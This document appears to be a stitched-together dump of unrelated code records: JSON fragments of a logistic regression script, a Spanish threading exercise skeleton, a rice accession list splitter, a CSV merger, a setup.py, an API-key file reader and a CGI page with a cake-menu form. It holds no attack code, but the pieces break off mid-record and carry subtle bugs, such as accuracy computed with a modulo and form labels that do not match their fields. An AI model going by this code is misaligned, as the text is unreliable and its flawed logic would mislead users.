"step-4": "import numpy as np\nfrom scipy import optimize\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply(1 - y, np.log(1 - sigmoid(X * theta.T)))\n reg = lamda / (2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2)\n )\n return np.sum(first - second) / len(X) + reg\n\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n error = sigmoid(X * theta.T) - y\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n if i == 0:\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = np.sum(term) / len(X) + lamda / len(X) * theta[:, i]\n return grad\n\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [(1 if x >= 0.5 else 0) for x in probability]\n\n\ndef implement_for_LR(X_train, X_test, y_train, y_test, lamda=1):\n n = X_train.shape[1]\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg,\n args=(X_train, y_train, lamda))\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [(1 if a == 1 and b == 1 or a == 0 and b == 0 else 0) for a,\n b in zip(predictions, y_test)]\n accuracy = sum(map(int, correct)) % len(correct)\n print('accuracy = {0}%'.format(accuracy))\n",
"step-5": "#!/usr/bin/env/ python\n# -*- coding:utf-8 -*-\n# Created by: Vanish\n# Created on: 2019/9/25\n\n\nimport numpy as np\nfrom scipy import optimize\n\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\n\ndef costReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n reg = (lamda / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return np.sum(first - second) / len(X) + reg\n\ndef gradientReg(theta, X, y, lamda):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n\n for i in range(parameters):\n term = np.multiply(error, X[:, i])\n\n if (i == 0):\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = (np.sum(term) / len(X)) + ((lamda / len(X)) * theta[:, i])\n\n return grad\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [1 if x >= 0.5 else 0 for x in probability]\n\ndef implement_for_LR(X_train, X_test, y_train, y_test,lamda=1):\n n = X_train.shape[1]\n # convert to numpy arrays and initalize the parameter array theta\n X_train = np.array(X_train.values)\n y_train = np.array(y_train.values)\n theta = np.zeros(n)\n\n result = optimize.fmin_tnc(func=costReg, x0=theta, fprime=gradientReg, args=(X_train, y_train, lamda))\n\n theta_min = np.matrix(result[0])\n predictions = predict(theta_min, X_test)\n correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y_test)]\n accuracy = (sum(map(int, correct)) % len(correct))\n print('accuracy = {0}%'.format(accuracy))",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
from threading import Thread, Lock
from utils import reloj
import random
class Imprimidor(Thread):
def __init__(self, nombre, berlin, bolsa_dinero):
super().__init__()
pass
def run(self):
'''
Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada
iteracion chequea si se cumple que hay problema con el dinero (20%)
'''
pass
def imprimir_dinero(self, dinero):
'''
Llamar a este método para imprimir dinero.
***Acá debes procurarte de evitar errores de concurrencia***
:param dinero:
:return:
'''
pass
def problema_papel(self):
'''
Probabilidad de problema con el papel de 20%
'''
pass
|
normal
|
{
"blob_id": "ab79e2f9584dbbb526c62bde882a1bc9874b56f9",
"index": 7903,
"step-1": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n <mask token>\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n\n def imprimir_dinero(self, dinero):\n \"\"\"\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n \"\"\"\n pass\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-4": "from threading import Thread, Lock\nfrom utils import reloj\nimport random\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n \"\"\"\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n \"\"\"\n pass\n\n def imprimir_dinero(self, dinero):\n \"\"\"\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n \"\"\"\n pass\n\n def problema_papel(self):\n \"\"\"\n Probabilidad de problema con el papel de 20%\n \"\"\"\n pass\n",
"step-5": "from threading import Thread, Lock\nfrom utils import reloj\nimport random\n\n\nclass Imprimidor(Thread):\n\n def __init__(self, nombre, berlin, bolsa_dinero):\n super().__init__()\n pass\n\n def run(self):\n '''\n Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada\n iteracion chequea si se cumple que hay problema con el dinero (20%)\n '''\n pass\n\n def imprimir_dinero(self, dinero):\n '''\n Llamar a este método para imprimir dinero.\n ***Acá debes procurarte de evitar errores de concurrencia***\n :param dinero:\n :return:\n '''\n pass\n\n def problema_papel(self):\n '''\n Probabilidad de problema con el papel de 20%\n '''\n pass\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
#!/opt/Python/2.7.3/bin/python
import sys
from collections import defaultdict
import numpy as np
import re
import os
import argparse
from Bio import SeqIO
def usage():
test="name"
message='''
python CircosConf.py --input circos.config --output pipe.conf
'''
print message
def fasta_id(fastafile):
fastaid = defaultdict(str)
for record in SeqIO.parse(fastafile,"fasta"):
fastaid[record.id] = 1
return fastaid
#temperate.mPing.group.id
def readtable(infile):
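    # collect the unique values of the first tab-separated column as dictionary keys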
data = defaultdict(str)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not data.has_key(unit[0]):
data[unit[0]] = 1
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input')
parser.add_argument('-o', '--output')
parser.add_argument('-v', dest='verbose', action='store_true')
args = parser.parse_args()
try:
len(args.input) > 0
except:
usage()
sys.exit(2)
unique_id = readtable(args.input)
#1 IRIS313-15896 Colombia Indica ERS467753 [email protected]:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra
infile = '../GigaScience/rice_line_IRRI_2466.download.list'
count = 0
other_id = defaultdict(lambda : int())
total_id = defaultdict(lambda : int())
r = re.compile(r'Japonica', re.IGNORECASE)
ofiles = []
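    # open 7 output lists; accessions are written in blocks of roughly 100 per file (index = count / 100)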
for i in range(7):
ofile = open('%s.other%s.download.list' %(args.input, i), 'w')
ofiles.append(ofile)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not r.search(unit[3]):
continue
total_id[unit[1]] = 1
if not unique_id.has_key(unit[1]):
other_id[unit[1]] = 1
count = len(other_id.keys())
index = int(float(count)/100)
#print index, count, unit[1]
print >> ofiles[index], line
for i in range(7):
ofiles[i].close()
print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))
print 'other: %s' %(count)
print 'total: %s' %(len(total_id.keys()))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "fe0d6cc03512d54d2d8722551e3f2a7c1bf43997",
"index": 3581,
"step-1": "#!/opt/Python/2.7.3/bin/python\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport re\nimport os\nimport argparse\nfrom Bio import SeqIO\n\ndef usage():\n test=\"name\"\n message='''\npython CircosConf.py --input circos.config --output pipe.conf\n\n '''\n print message\n\ndef fasta_id(fastafile):\n fastaid = defaultdict(str)\n for record in SeqIO.parse(fastafile,\"fasta\"):\n fastaid[record.id] = 1\n return fastaid\n\n\n#temperate.mPing.group.id\ndef readtable(infile):\n data = defaultdict(str)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2: \n unit = re.split(r'\\t',line)\n if not data.has_key(unit[0]):\n data[unit[0]] = 1\n return data\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input')\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n try:\n len(args.input) > 0\n except:\n usage()\n sys.exit(2)\n\n unique_id = readtable(args.input)\n #1 IRIS313-15896 Colombia Indica ERS467753 [email protected]:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra\n infile = '../GigaScience/rice_line_IRRI_2466.download.list'\n count = 0\n other_id = defaultdict(lambda : int())\n total_id = defaultdict(lambda : int())\n r = re.compile(r'Japonica', re.IGNORECASE)\n ofiles = []\n for i in range(7):\n ofile = open('%s.other%s.download.list' %(args.input, i), 'w')\n ofiles.append(ofile)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2:\n unit = re.split(r'\\t',line)\n if not r.search(unit[3]):\n continue\n total_id[unit[1]] = 1\n if not unique_id.has_key(unit[1]):\n other_id[unit[1]] = 1\n count = len(other_id.keys())\n index = int(float(count)/100)\n #print index, count, unit[1]\n print >> ofiles[index], line\n for i in range(7):\n ofiles[i].close()\n print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))\n print 'other: %s' %(count)\n print 'total: %s' %(len(total_id.keys()))\nif __name__ == '__main__':\n main()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
if __name__== '__main__':
with open('./input/day6', 'r') as f:
orbit_input = [l.strip().split(")") for l in f.readlines()]
planets = [planet[0] for planet in orbit_input]
planets1 = [planet[1] for planet in orbit_input]
planets = set(planets+planets1)
system = {}
print(orbit_input)
for inp in orbit_input:
system[inp[1]] = inp[0]
def compute_orbits(planet, system):
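        # recursively count hops up the parent chain until reaching COM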
if planet == 'COM':
return 0
next_p = system[planet]
return 1 + compute_orbits(next_p, system)
num_orb = 0
for planet in planets:
num_orb = num_orb + compute_orbits(planet, system)
print(num_orb)
|
normal
|
{
"blob_id": "96778a238d8ed8ae764d0cf8ec184618dc7cfe18",
"index": 5790,
"step-1": "<mask token>\n",
"step-2": "if __name__ == '__main__':\n with open('./input/day6', 'r') as f:\n orbit_input = [l.strip().split(')') for l in f.readlines()]\n planets = [planet[0] for planet in orbit_input]\n planets1 = [planet[1] for planet in orbit_input]\n planets = set(planets + planets1)\n system = {}\n print(orbit_input)\n for inp in orbit_input:\n system[inp[1]] = inp[0]\n\n def compute_orbits(planet, system):\n if planet == 'COM':\n return 0\n next_p = system[planet]\n return 1 + compute_orbits(next_p, system)\n num_orb = 0\n for planet in planets:\n num_orb = num_orb + compute_orbits(planet, system)\n print(num_orb)\n",
"step-3": "\nif __name__== '__main__':\n with open('./input/day6', 'r') as f:\n orbit_input = [l.strip().split(\")\") for l in f.readlines()]\n planets = [planet[0] for planet in orbit_input]\n planets1 = [planet[1] for planet in orbit_input]\n planets = set(planets+planets1)\n system = {}\n print(orbit_input)\n\n for inp in orbit_input:\n system[inp[1]] = inp[0]\n\n def compute_orbits(planet, system):\n if planet == 'COM':\n return 0\n next_p = system[planet]\n return 1 + compute_orbits(next_p, system)\n\n num_orb = 0\n for planet in planets:\n num_orb = num_orb + compute_orbits(planet, system)\n print(num_orb)\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from setuptools import find_packages, setup
NAME = 'compoelem'
VERSION = "0.1.1"
setup(
name=NAME,
packages=['compoelem', 'compoelem.generate', 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect', 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],
include_package_data=True,
version=VERSION,
description='Library for generating and comparing compositional elements from art historic images.',
author='Tilman Marquart',
license='MIT',
python_requires='>=3.8',
install_requires=['opencv-python','numpy','typing','shapely','pyyaml','torch','torchvision','yacs','scikit-image', 'pandas'],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
test_suite='tests',
)
|
normal
|
{
"blob_id": "4f81eb7218fa1341bd7f025a34ec0677d46151b0",
"index": 6542,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-3": "<mask token>\nNAME = 'compoelem'\nVERSION = '0.1.1'\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-4": "from setuptools import find_packages, setup\nNAME = 'compoelem'\nVERSION = '0.1.1'\nsetup(name=NAME, packages=['compoelem', 'compoelem.generate',\n 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect',\n 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True, version=VERSION, description=\n 'Library for generating and comparing compositional elements from art historic images.'\n , author='Tilman Marquart', license='MIT', python_requires='>=3.8',\n install_requires=['opencv-python', 'numpy', 'typing', 'shapely',\n 'pyyaml', 'torch', 'torchvision', 'yacs', 'scikit-image', 'pandas'],\n setup_requires=['pytest-runner'], tests_require=['pytest'], test_suite=\n 'tests')\n",
"step-5": "from setuptools import find_packages, setup\nNAME = 'compoelem'\nVERSION = \"0.1.1\"\nsetup(\n name=NAME,\n packages=['compoelem', 'compoelem.generate', 'compoelem.compare', 'compoelem.visualize', 'compoelem.detect', 'compoelem.detect.openpose', 'compoelem.detect.openpose.lib'],\n include_package_data=True,\n version=VERSION,\n description='Library for generating and comparing compositional elements from art historic images.',\n author='Tilman Marquart',\n license='MIT',\n python_requires='>=3.8',\n install_requires=['opencv-python','numpy','typing','shapely','pyyaml','torch','torchvision','yacs','scikit-image', 'pandas'],\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n test_suite='tests',\n)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import string
#takes file as input, outputs a dictionary of keys from the file
#file should be in format (apiName, key/id)
#dictionary key = apiName, value = key/id
def getKeys(f):
keys = {}
f = open(f, 'r')
for line in f:
apiInfo = line.split(',')
keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)
keys.pop('apiName', None)
return keys
#print(getKeys('keys.txt'))
|
normal
|
{
"blob_id": "3653c6fce33467600a3eea72578ed995606bfc03",
"index": 4100,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n",
"step-3": "import string\n\n\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n",
"step-4": "import string\n\n#takes file as input, outputs a dictionary of keys from the file\n#file should be in format (apiName, key/id)\n#dictionary key = apiName, value = key/id\ndef getKeys(f):\n keys = {}\n f = open(f, 'r')\n for line in f:\n apiInfo = line.split(',')\n keys[apiInfo[0]] = apiInfo[1].strip(string.whitespace)\n keys.pop('apiName', None)\n return keys\n\n#print(getKeys('keys.txt'))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
from pandas import DataFrame
myencoding = 'utf-8'
chikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']
# chikenList = ['pelicana']
newframe = DataFrame()
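# concatenate each store's CSV into one combined frame before writing allstore.csv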
for onestore in chikenList:
filename = onestore + '.csv'
myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)
# print(myframe.head())
# print('-'*30)
newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)
print(newframe.info())
totalfile = 'allstore.csv'
newframe.to_csv(totalfile, encoding=myencoding)
print(totalfile + '파일이 저장됨')
|
normal
|
{
"blob_id": "11a31d3276201105ca7485fa4e4eb711012accd5",
"index": 2190,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\n<mask token>\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-3": "<mask token>\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\nnewframe = DataFrame()\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-4": "import pandas as pd\nfrom pandas import DataFrame\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\nnewframe = DataFrame()\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\nprint(newframe.info())\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')\n",
"step-5": "import pandas as pd\nfrom pandas import DataFrame\n\nmyencoding = 'utf-8'\nchikenList = ['pelicana', 'nene', 'cheogajip', 'goobne']\n# chikenList = ['pelicana']\n\nnewframe = DataFrame()\n\nfor onestore in chikenList:\n filename = onestore + '.csv'\n myframe = pd.read_csv(filename, index_col=0, encoding=myencoding)\n # print(myframe.head())\n # print('-'*30)\n newframe = pd.concat([newframe, myframe], axis=0, ignore_index=True)\n\nprint(newframe.info())\n\ntotalfile = 'allstore.csv'\nnewframe.to_csv(totalfile, encoding=myencoding)\nprint(totalfile + '파일이 저장됨')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!C:\Python27\python
print('Content-Type:text/html\n\n')
print ("""
<html>
<head>
<link href="iconTech.png" rel="icon"/>
<meta name="viewport" content="width=device-width,intial-scale=1.0"/>
<link href="../css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="../css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link rel="stylesheet" href="../css/font-awesome.min.css" type="text/css"/>
<script src="../js/jquery.js"></script>
<script src="../js/bootstrap.min.js"></script>
<style>
.outer
{
min-height:100px;
}
.top
{
min-height:50px;
background:gray;
}
.logo
{
height:50px;
width:240px;
margin:5px 5px;
background:white;
font-size:30px;
font-family:Algerian;
border:5px double green;
}
.menu
{
height:50px;
width:1000px;
background:gray;
z-index:10;
}
#menu
{
background:none;
border:none;
box-shadow:none;
padding:1% 0%;
margin:0px;
font-size:15px;
}
#menu ul li a
{
color:white;
text-shadow:none;
font-weight:bold;
font-size:12px;
}
#menu ul li:hover
{
background:transparent;
}
.head
{
height:100px;
background:url('../bimg/d1.jpg');
background-attachment:fixed;
background-size:100% 100%;
}
.head1
{
height:100px;
background-color:rgba(0,0,0,.4);
color:white;
font-size:20px;
padding:2% 0%;
}
.addcake
{
min-height:550px;
margin-left:25%;
background:rgba(0,0,0,.3);
margin-top:20px;
margin-bottom:20px;
}
.footer
{
min-height:50px;
padding:1% 0%;
text-align:center;
color:white;
font-size:20px;
background:black;
}
</style>
</head>
<body>
<div class="col-sm-12 outer">
<div class="row">
<div class="col-sm-12 top">
<div class="row">
<div class="col-sm-3 logo">Bake<span style="color:orange;">-o-</span>logy</div>
<div class="col-sm-9 menu"> <nav class="navbar navbar-default" id="menu">
<div class="container-fluid">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only clpbtn">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1" >
<ul class="nav navbar-nav navbar-right">
<li><a href="index.py">Dashboard</a></li>
<li><a href="Addmenu.py">Add Menu</a></li>
<li><a href="Addservices.py">Add Services</a></li>
<li><a href="Addimages.py">Add Images</a></li>
<li><a href="OrderManagement.py">Order Management</a></li>
<li><a href="ContactManagement.py">Contact Management</a></li>
<li><a href="Changepassword.py">Change Password</a></li>
<li><a href="LogOut.py">LogOut</a></li>
</li>
</ul>
</div><!-- /.navbar-collapse -->
</div><!-- /.container-fluid -->
</nav>
</div></div></div>
<div class="col-sm-12 main">
<div class="row">
<div class="col-sm-12 head">
<div class="row">
<div class="col-sm-12 head1">
<div class="text-center"><span class="fa fa-cutlery "></span> Add Cake Menu </div>
</div>
</div></div>
</div></div>
<div class="col-sm-6 addcake">
<div class="h2 text-center">Add Cakes Menu</div>
<form action="../code/cakecode.py" enctype="multipart/form-data" method="post">
<div class="h4">Cake Name</div>
<input type="text" placeholder="Input Your Cake Name" name="cake" class="form-control">
<div class="h4">Cake Size</div>
<input type="text" placeholder="Input Your Cake size" name="size" class="form-control">
<div class="h4">Cake Weight</div>
<input type="text" placeholder="Input Your Cake Flavour" name="flavour" class="form-control">
<div class="h4">Price</div>
<input type="text" placeholder="Input Your Cake Weight" name="weight" class="form-control">
<div class="h4">Cake Flavour</div>
<input type="text" placeholder="Input Your Cake Price" name="price" class="form-control">
<div class="h4">Cake Image</div>
<input type="file" placeholder="Import Your Cake image" name="pic" class="form-control"><br/>
<input type="submit" class="form-control" value="Add">
</div>
<div class="col-sm-12 footer">
<div class="col-sm-6">©copyright:<a target="_blank" href="https://www.techpile.in">Techpile Technology.pvt.Ltd.</a>
</div>
<div class="col-sm-6">
Developed By:-Yash Rastogi</div>
</div>
</div>
</div>
</body>
</html>
""")
|
normal
|
{
"blob_id": "968cfcfe9d31adcd3a67a88a66e5ebe7b719be8d",
"index": 2841,
"step-1": "<mask token>\n",
"step-2": "print('Content-Type:text/html\\n\\n')\nprint(\n \"\"\"\n<html>\n<head>\n<link href=\"iconTech.png\" rel=\"icon\"/>\n<meta name=\"viewport\" content=\"width=device-width,intial-scale=1.0\"/>\n<link href=\"../css/bootstrap.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\n<link href=\"../css/bootstrap-theme.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\n<link rel=\"stylesheet\" href=\"../css/font-awesome.min.css\" type=\"text/css\"/>\n<script src=\"../js/jquery.js\"></script>\n<script src=\"../js/bootstrap.min.js\"></script>\n<style>\n.outer\n{\nmin-height:100px;\n}\n.top\n{\n min-height:50px;\n background:gray;\n}\n.logo\n{\n height:50px;\n width:240px;\n margin:5px 5px;\n background:white;\n font-size:30px;\n font-family:Algerian;\n border:5px double green;\n}\n.menu\n{\n height:50px;\n width:1000px;\n background:gray;\n z-index:10;\n}\n#menu\n{\n background:none;\n border:none;\n box-shadow:none;\n padding:1% 0%;\n margin:0px;\n font-size:15px;\n}\n#menu ul li a\n{\n color:white;\n text-shadow:none;\n font-weight:bold;\n font-size:12px;\n}\n#menu ul li:hover\n{\n background:transparent; \n}\n.head\n{\n height:100px;\n background:url('../bimg/d1.jpg');\n background-attachment:fixed;\n background-size:100% 100%;\n}\n.head1\n{\n height:100px;\n background-color:rgba(0,0,0,.4);\n color:white;\n font-size:20px;\n padding:2% 0%;\n}\n.addcake\n{\nmin-height:550px;\nmargin-left:25%;\nbackground:rgba(0,0,0,.3);\nmargin-top:20px;\nmargin-bottom:20px;\n}\n\n.footer\n{\n min-height:50px;\n padding:1% 0%;\n text-align:center;\n color:white;\n font-size:20px;\n background:black;\n}\n</style>\n</head>\n<body>\n<div class=\"col-sm-12 outer\">\n\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 top\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t\t<div class=\"col-sm-3 logo\">Bake<span style=\"color:orange;\">-o-</span>logy</div>\n\t\t\t\t\t<div class=\"col-sm-9 menu\">\t\t\t\t\t<nav class=\"navbar navbar-default\" id=\"menu\">\n <div class=\"container-fluid\">\n <!-- Brand and toggle get grouped for better mobile display -->\n <div class=\"navbar-header\">\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-example-navbar-collapse-1\" aria-expanded=\"false\">\n <span class=\"sr-only clpbtn\">Toggle navigation</span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n </button>\n </div>\n<!-- Collect the nav links, forms, and other content for toggling -->\n <div class=\"collapse navbar-collapse\" id=\"bs-example-navbar-collapse-1\" >\n <ul class=\"nav navbar-nav navbar-right\">\n <li><a href=\"index.py\">Dashboard</a></li>\n <li><a href=\"Addmenu.py\">Add Menu</a></li>\n\t\t<li><a href=\"Addservices.py\">Add Services</a></li>\n\t\t<li><a href=\"Addimages.py\">Add Images</a></li>\n\t\t<li><a href=\"OrderManagement.py\">Order Management</a></li>\n\t\t<li><a href=\"ContactManagement.py\">Contact Management</a></li>\n\t\t<li><a href=\"Changepassword.py\">Change Password</a></li>\n\t\t<li><a href=\"LogOut.py\">LogOut</a></li>\n\t\t</li>\n \n\t\t </ul>\n\t\t\t \n </div><!-- /.navbar-collapse -->\n </div><!-- /.container-fluid -->\n</nav>\n \t\t\t\t\t\n\t\t </div></div></div>\n\t\t\t\t<div class=\"col-sm-12 main\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 head\">\n\t\t\t\t<div class=\"row\">\n\t\t\t\t<div class=\"col-sm-12 head1\">\n\t\t\t\t<div class=\"text-center\"><span class=\"fa fa-cutlery \"></span> Add Cake Menu 
</div>\n\t\t\t\t</div>\n\t\t\t\t</div></div>\n\t\t\t\t</div></div>\n\t\t\t\t<div class=\"col-sm-6 addcake\">\n\t\t\t\t<div class=\"h2 text-center\">Add Cakes Menu</div>\n\t\t\t\t<form action=\"../code/cakecode.py\" enctype=\"multipart/form-data\" method=\"post\">\n\t\t\t\t<div class=\"h4\">Cake Name</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Name\" name=\"cake\" class=\"form-control\">\n\t\t\t\t<div class=\"h4\">Cake Size</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake size\" name=\"size\" class=\"form-control\">\n <div class=\"h4\">Cake Weight</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Flavour\" name=\"flavour\" class=\"form-control\">\n <div class=\"h4\">Price</div>\n\t\t\t\t <input type=\"text\" placeholder=\"Input Your Cake Weight\" name=\"weight\" class=\"form-control\">\n <div class=\"h4\">Cake Flavour</div>\n\t\t\t\t<input type=\"text\" placeholder=\"Input Your Cake Price\" name=\"price\" class=\"form-control\">\t\n <div class=\"h4\">Cake Image</div>\n\t\t\t\t<input type=\"file\" placeholder=\"Import Your Cake image\" name=\"pic\" class=\"form-control\"><br/>\n <input type=\"submit\" class=\"form-control\" 